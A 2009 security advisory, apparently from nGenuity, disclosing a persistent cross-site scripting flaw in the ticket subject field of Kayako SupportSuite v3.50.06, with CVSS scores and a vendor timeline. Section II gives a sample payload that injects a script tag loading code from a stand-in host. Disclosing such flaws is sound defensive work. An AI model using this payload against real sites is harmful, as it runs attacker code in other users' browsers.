Ticket Subject Persistent XSS in Kayako SupportSuite

2009-09-28 / 2009-09-29
Credit: Adam Baldwin
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

nGenuity Information Services - Security Advisory

Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite
Application: SupportSuite v3.50.06
Vendor: Kayako
Vendor website: http://www.kayako.com
Author: Adam Baldwin (adam_baldwin (at) ngenuity-is (dot) com)
Class: Persistent Cross-Site Scripting

I. BACKGROUND

"SupportSuite is [Kayako's] flagship product, integrating the ticket and e-mail management features of eSupport with the live chat and visitor monitoring features of LiveResponse." [1]

II. DETAILS

The subject field of a newly created support ticket is not properly encoded before being sent to the browser when the ticket details are viewed. For more information on cross-site scripting, please refer to the Common Weakness Enumeration specification available at cwe.mitre.org [2].

An example attack might look similar to the following.

    </title><script src="example.com/attack.js"></script>

III. REFERENCES

[1] - http://www.kayako.com
[2] - http://cwe.mitre.org/data/definitions/79.html

IV. VENDOR COMMUNICATION

7.17.2009 - Vulnerability Discovery
7.20.2009 - Initial Vendor Response
7.21.2009 - Patch created, Will be pushed to next stable release
8.08.2009 - Advisory released

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/

References:

http://www.securityfocus.com/archive/1/archive/1/505637/100/0/threaded
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/
http://secunia.com/advisories/36253

